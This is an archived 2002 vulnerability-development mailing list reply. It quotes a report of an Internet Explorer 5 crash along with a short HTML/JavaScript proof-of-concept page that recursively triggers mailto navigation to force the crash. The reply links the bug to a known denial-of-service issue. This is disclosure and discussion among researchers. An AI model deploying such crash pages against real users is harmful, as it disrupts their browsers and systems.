Vulnerability Development mailing list archives
RE: Buffer Overflow with all versions of Internet Explorer and Ja vacript.
From: Patrik Birgersson <float () aiasec com>
Date: Mon, 3 Jun 2002 23:17:33 +0200 (CEST)
This seems quite familiar to the "Multiple Vendor JavaScript Interpreter Denial Of Service Vulnerability" reported to Bugtraq in march. http://online.securityfocus.com/bid/4322 Patrik Birgersson
-----Original Message----- From: Matias Sedalo [mailto:s0t4ipv6 () shellcode com ar] Sent: 2. juni 2002 23:08 To: vuln-dev () securityfocus com Subject: Buffer Overflow with all versions of Internet Explorer and Javacript. the 28/07/1999 I have discovered a stack buffer overflow caused by until the moment all the versions of the Internet Explorer. In many windows98 causes the necessity to reinitiate the equipment, since to my to seem it remains without memory. Only it has been proven in several versions 5 of IE on WindowsNT server sp6 and windows98 Second Edition. As I said before the Windows 98 I had to reinitiate it to the force. Can be possible to execute arbitrary code using the variable company of the example? // internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6 // internet Explorer 5.00.3500.1003 on Windows98se -----------cut here--------------------------- <html><head></head> <script language="JAVASCRIPT"> function hacerMail() { var company; crear(); address="s0t4ipv6 () shellcode com ar"; soporte(); } function soporte(){ var soporte="bill () mocosoft com"; window.location="mailto:"+address+"?cc="+soporte+"&subject="+company; // window.location=company; // also this line cause the bof. close(hacerMail()); } function crear(){ company="shellcode here?\n"; // i don't think so. } </script> <input type="button" onClick="hacerMail();" value="SMASH!"></input> </html> -----------cut here--------------------------- Regards. - Internet es perjudicial para la salud - - Ley N~ 127.0.0.1 Matias Sedalo http://www.shellcode.com.ar s0t4ipv6 () shellcode com ar B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2 ........................................
Current thread:
- RE: Buffer Overflow with all versions of Internet Explorer and Ja vacript. Thor Larholm (Jun 03)
- RE: Buffer Overflow with all versions of Internet Explorer and Javacript. Elan Hasson (Jun 03)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Blue Boar (Jun 03)
- RE: Buffer Overflow with all versions of Internet Explorer and Javacript. Elan Hasson (Jun 04)
- Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Blue Boar (Jun 03)
- RE: Buffer Overflow with all versions of Internet Explorer and Ja vacript. Patrik Birgersson (Jun 03)
- <Possible follow-ups>
- RE: Buffer Overflow with all versions of Internet Explorer and Ja vacript. Thor Larholm (Jun 03)
- RE: Buffer Overflow with all versions of Internet Explorer and Javacript. Elan Hasson (Jun 03)